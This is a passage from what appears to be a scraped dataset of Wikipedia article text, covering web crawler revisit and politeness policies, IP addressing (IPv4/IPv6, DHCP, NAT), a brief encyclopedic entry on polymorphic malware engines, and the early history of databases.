files, that contains metadata of academic papers, such as titles, papers, and abstracts. This increases the overall number of papers, but a significant fraction may not provide free PDF downloads. Another type of focused crawlers is semantic focused crawler, which makes use of domain ontologies to represent topical maps and link Web pages with relevant ontological concepts for the selection and categorization purposes. 27 In addition, ontologies can be automatically updated in the crawling process. Dong et al. 28 introduced such an ontology-learning-based crawler using a support-vector machine to update the content of ontological concepts when crawling Web pages. The Web has a very dynamic nature, and crawling a fraction of the Web can take weeks or months. By the time a Web crawler has finished its crawl, many events could have happened, including creations, updates, and deletions. From the search engine's point of view, there is a cost associated with not detecting an event, and thus having an outdated copy of a resource. The most-used cost functions are freshness and age. 29 Freshness: This is a binary measure that indicates whether the local copy is accurate or not. The freshness of a page p in the repository at time t is defined as: Age: This is a measure that indicates how outdated the local copy is. The age of a page p in the repository, at time t is defined as: Coffman et al. worked with a definition of the objective of a Web crawler that is equivalent to freshness, but use a different wording: they propose that a crawler must minimize the fraction of time pages remain outdated. They also noted that the problem of Web crawling can be modeled as a multiple-queue, single-server polling system, on which the Web crawler is the server and the Web sites are the queues. Page modifications are the arrival of the customers, and switch-over times are the interval between page accesses to a single Web site. Under this model, mean waiting time for a customer in the polling system is equivalent to the average age for the Web crawler. 30 The objective of the crawler is to keep the average freshness of pages in its collection as high as possible, or to keep the average age of pages as low as possible. These objectives are not equivalent: in the first case, the crawler is just concerned with how many pages are outdated, while in the second case, the crawler is concerned with how old the local copies of pages are. Two simple re-visiting policies were studied by Cho and Garcia-Molina: 31 In both cases, the repeated crawling order of pages can be done either in a random or a fixed order. Cho and Garcia-Molina proved the surprising result that, in terms of average freshness, the uniform policy outperforms the proportional policy in both a simulated Web and a real Web crawl. Intuitively, the reasoning is that, as web crawlers have a limit to how many pages they can crawl in a given time frame, (1) they will allocate too many new crawls to rapidly changing pages at the expense of less frequently updating pages, and (2) the freshness of rapidly changing pages lasts for shorter period than that of less frequently changing pages. In other words, a proportional policy allocates more resources to crawling frequently updating pages, but experiences less overall freshness time from them. To improve freshness, the crawler should penalize the elements that change too often. 32 The optimal re-visiting policy is neither the uniform policy nor the proportional policy. The optimal method for keeping average freshness high includes ignoring the pages that change too often, and the optimal for keeping average age low is to use access frequencies that monotonically (and sub-linearly) increase with the rate of change of each page. In both cases, the optimal is closer to the uniform policy than to the proportional policy: as Coffman et al. note, "in order to minimize the expected obsolescence time, the accesses to any particular page should be kept as evenly spaced as possible". 30 Explicit formulas for the re-visit policy are not attainable in general, but they are obtained numerically, as they depend on the distribution of page changes. Cho and Garcia-Molina show that the exponential distribution is a good fit for describing page changes, 32 while Ipeirotis et al. show how to use statistical tools to discover parameters that affect this distribution. 33 The re-visiting policies considered here regard all pages as homogeneous in terms of quality ("all pages on the Web are worth the same"), something that is not a realistic scenario, so further information about the Web page quality should be included to achieve a better crawling policy. Crawlers can retrieve data much quicker and in greater depth than human searchers, so they can have a crippling impact on the performance of a site. If a single crawler is performing multiple requests per second and or downloading large files, a server can have a hard time keeping up with requests from multiple crawlers. As noted by Koster, the use of Web crawlers is useful for a number of tasks, but comes with a price for the general community. 34 The costs of using Web crawlers include: A partial solution to these problems is the robots exclusion protocol, also known as the robots.txt protocol that is a standard for administrators to indicate which parts of their Web servers should not be accessed by crawlers. 35 This standard does not include a suggestion for the interval of visits to the same server, even though this interval is the most effective way of avoiding server overload. Recently commercial search engines like Google, Ask Jeeves, MSN and Yahoo Search are able to use an extra "Crawl-delay: parameter in the robots.txt file to indicate the number of seconds to delay between requests. The first proposed interval between successive pageloads was 60 seconds. 36 However, if pages were downloaded at this rate from a website with more than 100,000 pages over a perfect connection with zero latency and infinite bandwidth, it would take more than 2 months to download only that entire Web site; also, only a fraction of the resources from that Web server would be used. Cho uses 10 seconds as an interval for accesses, 31 and the WIRE crawler uses 15 seconds as the default. 37 The MercatorWeb crawler follows an adaptive politeness policy: if it took t seconds to download a document from a given server, the crawler waits for 10t seconds before downloading the next page. 38 Dill et al. use 1 second. 39 For those using Web crawlers for research purposes, a more detailed cost-benefit analysis is needed and ethical considerations should be taken into account when deciding where to crawl and how fast to crawl. 40 Anecdotal evidence from access logs shows that access intervals from known crawlers vary between 20 seconds and 3 4 minutes. It is worth noticing that even when being very polite, and taking all the safeguards to avoid overloading Web servers, some complaints from Web server administrators are received. Sergey Brin and Larry Page noted in 1998, ... running a crawler which connects to more than half a million servers ... generates a fair amount of e-mail and phone calls. Because of the vast number of people coming on line, there are always those who do not know what a crawler is, because this is the first one they have seen. 41 A parallel crawler is a crawler that runs multiple processes in parallel. The goal is to maximize the download rate while minimizing the overhead from parallelization and to avoid repeated downloads of the same page. To avoid downloading the same page more than once, the crawling system requires a policy for assigning the new URLs discovered during the crawling process, as the same URL can be found by two different crawling processes. A crawler must not only have a good crawling strategy, as noted in the previous sections, but it should also have a highly optimized architecture. Shkapenyuk and Suel noted that: 42 While it is fairly easy to build a slow crawler that downloads a few pages per second for a short period of time, building a high-performance system that can download hundreds of millions of pages over several weeks presents a number of challenges in system design, I O and network efficiency, and robustness and manageability. Web crawlers are a central part of search engines, and details on their algorithms and architecture are kept as business secrets. When crawler designs are published, there is often an important lack of detail that prevents others from reproducing the work. There are also emerging concerns about "search engine spamming", which prevent major search engines from publishing their ranking algorithms. While most of the website owners are keen to have their pages indexed as broadly as possible to have strong presence in search engines, web crawling can also have unintended consequences and lead to a compromise or data breach if a search engine indexes resources that should not be publicly available, or pages revealing potentially vulnerable versions of software. Apart from standard web application security recommendations website owners can reduce their exposure to opportunistic hacking by only allowing search engines to index the public parts of their websites (with robots.txt) and explicitly blocking them from indexing transactional parts (login pages, private pages, etc.). Web crawlers typically identify themselves to a Web server by using the User-agent field of an HTTP request. Web site administrators typically examine their Web servers' log and use the user agent field to determine which crawlers have visited the web server and how often. The user agent field may include a URL where the Web site administrator may find out more information about the crawler. Examining Web server log is tedious task, and therefore some administrators use tools to identify, track and verify Web crawlers. Spambots and other malicious Web crawlers are unlikely to place identifying information in the user agent field, or they may mask their identity as a browser or other well-known crawler. Web site administrators prefer Web crawlers to identify themselves so that they can contact the owner if needed. In some cases, crawlers may be accidentally trapped in a crawler trap or they may be overloading a Web server with requests, and the owner needs to stop the crawler. Identification is also useful for administrators that are interested in knowing when they may expect their Web pages to be indexed by a particular search engine. A vast amount of web pages lie in the deep or invisible web. 43 These pages are typically only accessible by submitting queries to a database, and regular crawlers are unable to find these pages if there are no links that point to them. Google's Sitemaps protocol and mod oai 44 are intended to allow discovery of these deep-Web resources. Deep web crawling also multiplies the number of web links to be crawled. Some crawlers only take some of the URLs in a href "URL" form. In some cases, such as the Googlebot, Web crawling is done on all text contained inside the hypertext content, tags, or text. Strategic approaches may be taken to target deep Web content. With a technique called screen scraping, specialized software may be customized to automatically and repeatedly query a given Web form with the intention of aggregating the resulting data. Such software can be used to span multiple Web forms across multiple Websites. Data extracted from the results of one Web form submission can be taken and applied as input to another Web form thus establishing continuity across the Deep Web in a way not possible with traditional web crawlers. 45 Pages built on AJAX are among those causing problems to web crawlers. Google has proposed a format of AJAX calls that their bot can recognize and index. 46 There are a number of "visual web scraper crawler" products available on the web which will crawl pages and structure data into columns and rows based on the users requirements. One of the main difference between a classic and a visual crawler is the level of programming ability required to set up a crawler. The latest generation of "visual scrapers" remove the majority of the programming skill needed to be able to program and start a crawl to scrape web data. The visual scraping crawling method relies on the user "teaching" a piece of crawler technology, which then follows patterns in semi-structured data sources. The dominant method for teaching a visual crawler is by highlighting data in a browser and training columns and rows. While the technology is not new, for example it was the basis of Needlebase which has been bought by Google (as part of a larger acquisition of ITA Labs 47 ), there is continued growth and investment in this area by investors and end-users. citation needed The following is a list of published crawler architectures for general-purpose crawlers (excluding focused web crawlers), with a brief description that includes the names given to the different components and outstanding features: The following web crawlers are available, for a price:: |
245 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/IP_address | An Internet Protocol address (IP address) is a numerical label such as 192.0.2.1 that is assigned to a device connected to a computer network that uses the Internet Protocol for communication. 1 2 IP addresses serve two main functions: network interface identification, and location addressing. Internet Protocol version 4 (IPv4) defines an IP address as a 32 bit number. 2 However, because of the growth of the Internet and the depletion of available IPv4 addresses, a new version of IP (IPv6), using 128 bits for the IP address, was standardized in 1998. 3 4 5 IPv6 deployment has been ongoing since the mid 2000s. IP addresses are written and displayed in human-readable notations, such as 192.0.2.1 in IPv4, and 2001:db8:0:1234:0:567:8:1 in IPv6. The size of the routing prefix of the address is designated in CIDR notation by suffixing the address with the number of significant bits, e.g., 192.0.2.1 24, which is equivalent to the historically used subnet mask 255.255.255.0. The IP address space is managed globally by the Internet Assigned Numbers Authority (IANA), and by five regional Internet registries (RIRs) responsible in their designated territories for assignment to local Internet registries, such as Internet service providers (ISPs), and other end users. IPv4 addresses were distributed by IANA to the RIRs in blocks of approximately 16.8 million addresses each, but have been exhausted at the IANA level since 2011. Only one of the RIRs still has a supply for local assignments in Africa. 6 Some IPv4 addresses are reserved for private networks and are not globally unique. Network administrators assign an IP address to each device connected to a network. Such assignments may be on a static (fixed or permanent) or dynamic basis, depending on network practices and software features. Some jurisdictions consider IP addresses to be personal data. An IP address serves two principal functions: it identifies the host, or more specifically, its network interface, and it provides the location of the host in the network, and thus, the capability of establishing a path to that host. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there. 2 The header of each IP packet contains the IP address of the sending host and that of the destination host. Two versions of the Internet Protocol are in common use on the Internet today. The original version of the Internet Protocol that was first deployed in 1983 in the ARPANET, the predecessor of the Internet, is Internet Protocol version 4 (IPv4). By the early 1990s, the rapid exhaustion of IPv4 address space available for assignment to Internet service providers and end-user organizations prompted the Internet Engineering Task Force (IETF) to explore new technologies to expand addressing capability on the Internet. The result was a redesign of the Internet Protocol which became eventually known as Internet Protocol Version 6 (IPv6) in 1995. 3 4 5 IPv6 technology was in various testing stages until the mid 2000s when commercial production deployment commenced. Today, these two versions of the Internet Protocol are in simultaneous use. Among other technical changes, each version defines the format of addresses differently. Because of the historical prevalence of IPv4, the generic term IP address typically still refers to the addresses defined by IPv4. The gap in version sequence between IPv4 and IPv6 resulted from the assignment of version 5 to the experimental Internet Stream Protocol in 1979, which however was never referred to as IPv5. Other versions v1 to v9 were defined, but only v4 and v6 ever gained widespread use. v1 and v2 were names for TCP protocols in 1974 and 1977, as there was no separate IP specification at the time. v3 was defined in 1978, and v3.1 is the first version where TCP is separated from IP. v6 is a synthesis of several suggested versions, v6 Simple Internet Protocol, v7 TP IX: The Next Internet, v8 PIP — The P Internet Protocol, and v9 TUBA — Tcp Udp with Big Addresses. 7 IP networks may be divided into subnetworks in both IPv4 and IPv6. For this purpose, an IP address is recognized as consisting of two parts: the network prefix in the high-order bits and the remaining bits called the rest field, host identifier, or interface identifier (IPv6), used for host numbering within a network. 1 The subnet mask or CIDR notation determines how the IP address is divided into network and host parts. The term subnet mask is only used within IPv4. Both IP versions however use the CIDR concept and notation. In this, the IP address is followed by a slash and the number (in decimal) of bits used for the network part, also called the routing prefix. For example, an IPv4 address and its subnet mask may be 192.0.2.1 and 255.255.255.0, respectively. The CIDR notation for the same IP address and subnet is 192.0.2.1 24, because the first 24 bits of the IP address indicate the network and subnet. An IPv4 address has a size of 32 bits, which limits the address space to 4294967296 (232) addresses. Of this number, some addresses are reserved for special purposes such as private networks ( 18 million addresses) and multicast addressing ( 270 million addresses). IPv4 addresses are usually represented in dot-decimal notation, consisting of four decimal numbers, each ranging from 0 to 255, separated by dots, e.g., 192.0.2.1. Each part represents a group of 8 bits (an octet) of the address. 8 In some cases of technical writing, specify IPv4 addresses may be presented in various hexadecimal, octal, or binary representations. In the early stages of development of the Internet Protocol, the network number was always the highest order octet (most significant eight bits). Because this method allowed for only 256 networks, it soon proved inadequate as additional networks developed that were independent of the existing networks already designated by a network number. In 1981, the addressing specification was revised with the introduction of classful network architecture. 2 Classful network design allowed for a larger number of individual network assignments and fine-grained subnetwork design. The first three bits of the most significant octet of an IP address were defined as the class of the address. Three classes (A, B, and C) were defined for universal unicast addressing. Depending on the class derived, the network identification was based on octet boundary segments of the entire address. Each class used successively additional octets in the network identifier, thus reducing the possible number of hosts in the higher order classes (B and C). The following table gives an overview of this now-obsolete system. Classful network design served its purpose in the startup stage of the Internet, but it lacked scalability in the face of the rapid expansion of networking in the 1990s. The class system of the address space was replaced with Classless Inter-Domain Routing (CIDR) in 1993. CIDR is based on variable-length subnet masking (VLSM) to allow allocation and routing based on arbitrary-length prefixes. Today, remnants of classful network concepts function only in a limited scope as the default configuration parameters of some network software and hardware components (e.g. netmask), and in the technical jargon used in network administrators' discussions. Early network design, when global end-to-end connectivity was envisioned for communications with all Internet hosts, intended that IP addresses be globally unique. However, it was found that this was not always necessary as private networks developed and public address space needed to be conserved. Computers not connected to the Internet, such as factory machines that communicate only with each other via TCP IP, need not have globally unique IP addresses. Today, such private networks are widely used and typically connect to the Internet with network address translation (NAT), when needed. Three non-overlapping ranges of IPv4 addresses for private networks are reserved. 9 These addresses are not routed on the Internet and thus their use need not be coordinated with an IP address registry. Any user may use any of the reserved blocks. Typically, a network administrator will divide a block into subnets; for example, many home routers automatically use a default address range of 192.168.0.0 through 192.168.0.255 (192.168.0.0 24). In IPv6, the address size was increased from 32 bits in IPv4 to 128 bits, thus providing up to 2128 (approximately 3.403 1038) addresses. This is deemed sufficient for the foreseeable future. The intent of the new design was not to provide just a sufficient quantity of addresses, but also redesign routing in the Internet by allowing more efficient aggregation of subnetwork routing prefixes. This resulted in slower growth of routing tables in routers. The smallest possible individual allocation is a subnet for 264 hosts, which is the square of the size of the entire IPv4 Internet. At these levels, actual address utilization ratios will be small on any IPv6 network segment. The new design also provides the opportunity to separate the addressing infrastructure of a network segment, i.e. the local administration of the segment's available space, from the addressing prefix used to route traffic to and from external networks. IPv6 has facilities that automatically change the routing prefix of entire networks, should the global connectivity or the routing policy change, without requiring internal redesign or manual renumbering. The large number of IPv6 addresses allows large blocks to be assigned for specific purposes and, where appropriate, to be aggregated for efficient routing. With a large address space, there is no need to have complex address conservation methods as used in CIDR. All modern desktop and enterprise server operating systems include native support for IPv6, but it is not yet widely deployed in other devices, such as residential networking routers, voice over IP (VoIP) and multimedia equipment, and some networking hardware. Just as IPv4 reserves addresses for private networks, blocks of addresses are set aside in IPv6. In IPv6, these are referred to as unique local addresses (ULAs). The routing prefix fc00:: 7 is reserved for this block, 10 which is divided into two 8 blocks with different implied policies. The addresses include a 40 bit pseudorandom number that minimizes the risk of address collisions if sites merge or packets are misrouted. Early practices used a different block for this purpose (fec0::), dubbed site-local addresses. 11 However, the definition of what constituted a site remained unclear and the poorly defined addressing policy created ambiguities for routing. This address type was abandoned and must not be used in new systems. 12 Addresses starting with fe80::, called link-local addresses, are assigned to interfaces for communication on the attached link. The addresses are automatically generated by the operating system for each network interface. This provides instant and automatic communication between all IPv6 hosts on a link. This feature is used in the lower layers of IPv6 network administration, such as for the Neighbor Discovery Protocol. Private and link-local address prefixes may not be routed on the public Internet. IP addresses are assigned to a host either dynamically as they join the network, or persistently by configuration of the host hardware or software. Persistent configuration is also known as using a static IP address. In contrast, when a computer's IP address is assigned each time it restarts, this is known as using a dynamic IP address. Dynamic IP addresses are assigned by network using Dynamic Host Configuration Protocol (DHCP). 13 DHCP is the most frequently used technology for assigning addresses. It avoids the administrative burden of assigning specific static addresses to each device on a network. It also allows devices to share the limited address space on a network if only some of them are online at a particular time. Typically, dynamic IP configuration is enabled by default in modern desktop operating systems. The address assigned with DHCP is associated with a lease and usually has an expiration period. If the lease is not renewed by the host before expiry, the address may be assigned to another device. Some DHCP implementations attempt to reassign the same IP address to a host, based on its MAC address, each time it joins the network. A network administrator may configure DHCP by allocating specific IP addresses based on MAC address. DHCP is not the only technology used to assign IP addresses dynamically. Bootstrap Protocol is a similar protocol and predecessor to DHCP. Dialup and some broadband networks use dynamic address features of the Point-to-Point Protocol. Computers and equipment used for the network infrastructure, such as routers and mail servers, are typically configured with static addressing. In the absence or failure of static or dynamic address configurations, an operating system may assign a link-local address to a host using stateless address autoconfiguration. Sticky is an informal term used to describe a dynamically assigned IP address that seldom changes. 14 IPv4 addresses, for example, are usually assigned with DHCP, and a DHCP service can use rules that maximize the chance of assigning the same address each time a client asks for an assignment. In IPv6, a prefix delegation can be handled similarly, to make changes as rare as feasible. In a typical home or small-office setup, a single router is the only device visible to an Internet service provider (ISP), and the ISP may try to provide a configuration that is as stable as feasible, i.e. sticky. On the local network of the home or business, a local DHCP server may be designed to provide sticky IPv4 configurations, and the ISP may provide a sticky IPv6 prefix delegation, giving clients the option to use sticky IPv6 addresses. Sticky should not be confused with static; sticky configurations have no guarantee of stability, while static configurations are used indefinitely and only changed deliberately. Address block 169.254.0.0 16 is defined for the special use of link-local addressing for IPv4 networks. 15 In IPv6, every interface, whether using static or dynamic addresses, also receives a link-local address automatically in the block fe80:: 10. 15 These addresses are only valid on the link, such as a local network segment or point-to-point connection, to which a host is connected. These addresses are not routable and, like private addresses, cannot be the source or destination of packets traversing the Internet. When the link-local IPv4 address block was reserved, no standards existed for mechanisms of address autoconfiguration. Filling the void, Microsoft developed a protocol called Automatic Private IP Addressing (APIPA), whose first public implementation appeared in Windows 98. 16 APIPA has been deployed on millions of machines and became a de facto standard in the industry. In May 2005, the IETF defined a formal standard for it. 17 An IP address conflict occurs when two devices on the same local physical or wireless network claim to have the same IP address. A second assignment of an address generally stops the IP functionality of one or both of the devices. Many modern operating systems notify the administrator of IP address conflicts. 18 19 When IP addresses are assigned by multiple people and systems with differing methods, any of them may be at fault. 20 21 22 23 24 If one of the devices involved in the conflict is the default gateway access beyond the LAN for all devices on the LAN, all devices may be impaired. IP addresses are classified into several classes of operational characteristics: unicast, multicast, anycast and broadcast addressing. The most common concept of an IP address is in unicast addressing, available in both IPv4 and IPv6. It normally refers to a single sender or a single receiver, and can be used for both sending and receiving. Usually, a unicast address is associated with a single device or host, but a device or host may have more than one unicast address. Sending the same data to multiple unicast addresses requires the sender to send all the data many times over, once for each recipient. Broadcasting is an addressing technique available in IPv4 to address data to all possible destinations on a network in one transmission operation as an all-hosts broadcast. All receivers capture the network packet. The address 255.255.255.255 is used for network broadcast. In addition, a more limited directed broadcast uses the all-ones host address with the network prefix. For example, the destination address used for directed broadcast to devices on the network 192.0.2.0 24 is 192.0.2.255. 25 IPv6 does not implement broadcast addressing and replaces it with multicast to the specially defined all-nodes multicast address. A multicast address is associated with a group of interested receivers. In IPv4, addresses 224.0.0.0 through 239.255.255.255 (the former Class D addresses) are designated as multicast addresses. 26 IPv6 uses the address block with the prefix ff00:: 8 for multicast. In either case, the sender sends a single datagram from its unicast address to the multicast group address and the intermediary routers take care of making copies and sending them to all interested receivers (those that have joined the corresponding multicast group). Like broadcast and multicast, anycast is a one-to-many routing topology. However, the data stream is not transmitted to all receivers, just the one which the router decides is closest in the network. Anycast addressing is a built-in feature of IPv6. 27 28 In IPv4, anycast addressing is implemented with Border Gateway Protocol using the shortest-path metric to choose destinations. Anycast methods are useful for global load balancing and are commonly used in distributed DNS systems. A host may use geolocation to deduce the geographic position of its communicating peer. 29 30 This is typically done by retrieving geolocation info about the IP address of the other node from a database. 31 A public IP address is a globally routable unicast IP address, meaning that the address is not an address reserved for use in private networks, such as those reserved by RFC 1918, or the various IPv6 address formats of local scope or site-local scope, for example for link-local addressing. Public IP addresses may be used for communication between hosts on the global Internet. In a home situation, a public IP address is the IP address assigned to the home's network by the ISP. In this case, it is also locally visible by logging into the router configuration. 32 Most public IP addresses change, and relatively often. Any type of IP address that changes is called a dynamic IP address. In home networks, the ISP usually assigns a dynamic IP. If an ISP gave a home network an unchanging address, it is more likely to be abused by customers who host websites from home, or by hackers who can try the same IP address over and over until they breach a network. 32 Multiple client devices can appear to share an IP address, either because they are part of a shared web hosting service environment or because an IPv4 network address translator (NAT) or proxy server acts as an intermediary agent on behalf of the client, in which case the real originating IP address is masked from the server receiving a request. A common practice is to have a NAT mask many devices in a private network. Only the public interface(s) of the NAT needs to have an Internet-routable address. 33 The NAT device maps different IP addresses on the private network to different TCP or UDP port numbers on the public network. In residential networks, NAT functions are usually implemented in a residential gateway. In this scenario, the computers connected to the router have private IP addresses and the router has a public address on its external interface to communicate on the Internet. The internal computers appear to share one public IP address. In March 2024, the Supreme Court of Canada decided that IP addresses were protected private information under the Canadian Charter of Rights and Freedoms, with police searches requiring a warrant in order to obtain them. 34 IP addresses are considered personal data by the European Commission and are protected by the General Data Protection Regulation. 35 Computer operating systems provide various diagnostic tools to examine network interfaces and address configuration. Microsoft Windows provides the command-line interface tools ipconfig 36 and netsh and users of Unix-like systems may use ifconfig, netstat, route, lanstat, fstat, and iproute2 utilities to accomplish the task. 37 |
246 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Polymorphic_engine | A polymorphic engine (sometimes called mutation engine or mutating engine) is a software component that uses polymorphic code to alter the payload while preserving the same functionality. Polymorphic engines are used almost exclusively in malware, with the purpose of being harder for antivirus software to detect. They do so either by encrypting or obfuscating the malware payload. One common deployment is a file binder that weaves malware into normal files, such as office documents. Since this type of malware is usually polymorphic, it is also known as a polymorphic packer. The engine of the Virut botnet is an example of a polymorphic engine. 1 |
247 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Database | In computing, a database is an organized collection of data or a type of data store based on the use of a database management system (DBMS), the software that interacts with end users, applications, and the database itself to capture and analyze the data. The DBMS additionally encompasses the core facilities provided to administer the database. The sum total of the database, the DBMS and the associated applications can be referred to as a database system. Often the term "database" is also used loosely to refer to any of the DBMS, the database system or an application associated with the database. Small databases can be stored on a file system, while large databases are hosted on computer clusters or cloud storage. The design of databases spans formal techniques and practical considerations, including data modeling, efficient data representation and storage, query languages, security and privacy of sensitive data, and distributed computing issues, including supporting concurrent access and fault tolerance. Computer scientists may classify database management systems according to the database models that they support. Relational databases became dominant in the 1980s. These model data as rows and columns in a series of tables, and the vast majority use SQL for writing and querying data. In the 2000s, non-relational databases became popular, collectively referred to as NoSQL, because they use different query languages. Formally, a "database" refers to a set of related data accessed through the use of a "database management system" (DBMS), which is an integrated set of computer software that allows users to interact with one or more databases and provides access to all of the data contained in the database (although restrictions may exist that limit access to particular data). The DBMS provides various functions that allow entry, storage and retrieval of large quantities of information and provides ways to manage how that information is organized. Because of the close relationship between them, the term "database" is often used casually to refer to both a database and the DBMS used to manipulate it. Outside the world of professional information technology, the term database is often used to refer to any collection of related data (such as a spreadsheet or a card index) as size and usage requirements typically necessitate use of a database management system. 1 Existing DBMSs provide various functions that allow management of a database and its data which can be classified into four main functional groups: Both a database and its DBMS conform to the principles of a particular database model. 5 "Database system" refers collectively to the database model, database management system, and database. 6 Physically, database servers are dedicated computers that hold the actual databases and run only the DBMS and related software. Database servers are usually multiprocessor computers, with generous memory and RAID disk arrays used for stable storage. Hardware database accelerators, connected to one or more servers via a high-speed channel, are also used in large-volume transaction processing environments. DBMSs are found at the heart of most database applications. DBMSs may be built around a custom multitasking kernel with built-in networking support, but modern DBMSs typically rely on a standard operating system to provide these functions. citation needed Since DBMSs comprise a significant market, computer and storage vendors often take into account DBMS requirements in their own development plans. 7 Databases and DBMSs can be categorized according to the database model(s) that they support (such as relational or XML), the type(s) of computer they run on (from a server cluster to a mobile phone), the query language(s) used to access the database (such as SQL or XQuery), and their internal engineering, which affects performance, scalability, resilience, and security. The sizes, capabilities, and performance of databases and their respective DBMSs have grown in orders of magnitude. These performance increases were enabled by the technology progress in the areas of processors, computer memory, computer storage, and computer networks. The concept of a database was made possible by the emergence of direct access storage media such as magnetic disks, which became widely available in the mid 1960s; earlier systems relied on sequential storage of data on magnetic tape. The subsequent development of database technology can be divided into three eras based on data model or structure: navigational, 8 SQL relational, and post-relational. The two main early navigational data models were the hierarchical model and the CODASYL model (network model). These were characterized by the use of pointers (often physical disk addresses) to follow relationships from one record to another. The relational model, first proposed in 1970 by Edgar F. Codd, departed from this tradition by insisting that applications should search for data by content, rather than by following links. The relational model employs sets of ledger-style tables, each used for a different type of entity. Only in the mid 1980s did computing hardware become powerful enough to allow the wide deployment of relational systems (DBMSs plus applications). By the early 1990s, however, relational systems dominated in all large-scale data processing applications, and as of 2018 update they remain dominant: IBM Db2, Oracle, MySQL, and Microsoft SQL Server are the most searched DBMS. 9 The dominant database language, standardized SQL for the relational model, has influenced database languages for other data models. citation needed Object databases were developed in the 1980s to overcome the inconvenience of object relational impedance mismatch, which led to the coining of the term "post-relational" and also the development of hybrid object relational databases. The next generation of post-relational databases in the late 2000s became known as NoSQL databases, introducing fast key value stores and document-oriented databases. A competing "next generation" known as NewSQL databases attempted new implementations that retained the relational SQL model while aiming to match the high performance of NoSQL compared to commercially available relational DBMSs. The introduction of the term database coincided with the availability of direct-access storage (disks and drums) from the mid 1960s onwards. The term represented a contrast with the tape-based systems of the past, allowing shared interactive use rather than daily batch processing. The Oxford English Dictionary cites a 1962 report by the System Development Corporation of California as the first to use the term "data-base" in a specific technical sense. 10 As computers grew in speed and capability, a number of general-purpose database systems emerged; by the mid 1960s a number of such systems had come into commercial use. Interest in a standard began to grow, and Charles Bachman, author of one such product, the Integrated Data Store (IDS), founded the Database Task Group within CODASYL, the group responsible for the creation and standardization of COBOL. In 1971, the Database Task Group delivered their standard, which generally became known as the CODASYL approach, and soon a number of commercial products based on this approach entered the market. The CODASYL approach offered applications the ability to navigate around a linked data set which was formed into a large network. Applications could find records by one of three methods: Later systems added B-trees to provide alternate access paths. Many CODASYL databases also added a declarative query language for end users (as distinct from the navigational API). However, CODASYL databases were complex and required significant training and effort to produce useful applications. IBM also had its own DBMS in 1966, known as Information Management System (IMS). IMS was a development of software written for the Apollo program on the System 360. IMS was generally similar in concept to CODASYL, but used a strict hierarchy for its model of data navigation instead of CODASYL's network model. Both concepts later became known as navigational databases due to the way data was accessed: the term was popularized by Bachman's 1973 Turing Award presentation The Programmer as Navigator. IMS is classified by IBM as a hierarchical database. IDMS and Cincom Systems' TOTAL broken anchor databases are classified as network databases. IMS remains in use as of 2014 update . 11 Edgar F. Codd worked at IBM in San Jose, California, in one of their offshoot offices that were primarily involved in the development of hard disk systems. He was unhappy with the navigational model of the CODASYL approach, notably the lack of a "search" facility. In 1970, he wrote a number of papers that outlined a new approach to database construction that eventually culminated in the groundbreaking A Relational Model of Data for Large Shared Data Banks. 12 In this paper, he described a new system for storing and working with large databases. Instead of records being stored in some sort of linked list of free-form records as in CODASYL, Codd's idea was to organize the data as a number of "tables", each table being used for a different type of entity. Each table would contain a fixed number of columns containing the attributes of the entity. One or more columns of each table were designated as a primary key by which the rows of the table could be uniquely identified; cross-references between tables always used these primary keys, rather than disk addresses, and queries would join tables based on these key relationships, using a set of operations based on the mathematical system of relational calculus (from which the model takes its name). Splitting the data into a set of normalized tables (or relations) aimed to ensure that each "fact" was only stored once, thus simplifying update operations. Virtual tables called views could present the data in different ways for different users, but views could not be directly updated. Codd used mathematical terms to define the model: relations, tuples, and domains rather than tables, rows, and columns. The terminology that is now familiar came from early implementations. Codd would later criticize the tendency for practical implementations to depart from the mathematical foundations on which the model was based. The use of primary keys (user-oriented identifiers) to represent cross-table relationships, rather than disk addresses, had two primary motivations. From an engineering perspective, it enabled tables to be relocated and resized without expensive database reorganization. But Codd was more interested in the difference in semantics: the use of explicit identifiers made it easier to define update operations with clean mathematical definitions, and it also enabled query operations to be defined in terms of the established discipline of first-order predicate calculus; because these operations have clean mathematical properties, it becomes possible to rewrite queries in provably correct ways, which is the basis of query optimization. There is no loss of expressiveness compared with the hierarchic or network models, though the connections between tables are no longer so explicit. In the hierarchic and network models, records were allowed to have a complex internal structure. For example, the salary history of an employee might be represented as a "repeating group" within the employee record. In the relational model, the process of normalization led to such internal structures being replaced by data held in multiple tables, connected only by logical keys. For instance, a common use of a database system is to track information about users, their name, login information, various addresses and phone numbers. In the navigational approach, all of this data would be placed in a single variable-length record. In the relational approach, the data would be normalized into a user table, an address table and a phone number table (for instance). Records would be created in these optional tables only if the address or phone numbers were actually provided. As well as identifying rows records using logical identifiers rather than disk addresses, Codd changed the way in which applications assembled data from multiple records. Rather than requiring applications to gather data one record at a time by navigating the links, they would use a declarative query language that expressed what data was required, rather than the access path by which it should be found. Finding an efficient access path to the data became the responsibility of the database management system, rather than the application programmer. This process, called query optimization, depended on the fact that queries were expressed in terms of mathematical logic. Codd's paper was picked up by two people at Berkeley, Eugene Wong and Michael Stonebraker. They started a project known as INGRES using funding that had already been allocated for a geographical database project and student programmers to produce code. Beginning in 1973, INGRES delivered its first test products which were generally ready for widespread use in 1979. INGRES was similar to System R in a number of ways, including the use of a "language" for data access, known as QUEL. Over time, INGRES moved to the emerging SQL standard. IBM itself did one test implementation of the relational model, PRTV, and a production one, Business System 12, both now discontinued. Honeywell wrote MRDS for Multics, and now there are two new implementations: Alphora Dataphor and Rel. Most other DBMS implementations usually called relational are actually SQL DBMSs. In 1970, the University of Michigan began development of the MICRO Information Management System 13 based on D.L. Childs' Set-Theoretic Data model. 14 15 16 MICRO was used to manage very large data sets by the US Department of Labor, the U.S. Environmental Protection Agency, and researchers from the University of Alberta, the University of Michigan, and Wayne State University. It ran on IBM mainframe computers using the Michigan Terminal System. 17 The system remained in production until 1998. In the 1970s and 1980s, attempts were made to build database systems with integrated hardware and software. The underlying philosophy was that such integration would provide higher performance at a lower cost. Examples were IBM System 38, the early offering of Teradata, and the Britton Lee, Inc. database machine. Another approach to hardware support for database management was ICL's CAFS accelerator, a hardware disk controller with programmable search capabilities. In the long term, these efforts were generally unsuccessful because specialized database machines could not keep pace with the rapid development and progress of general-purpose computers. Thus most database systems nowadays are software systems running on general-purpose hardware, using general-purpose computer data storage. However, this idea is still pursued in certain applications by some companies like Netezza and Oracle (Exadata). IBM started working on a prototype system loosely based on Codd's 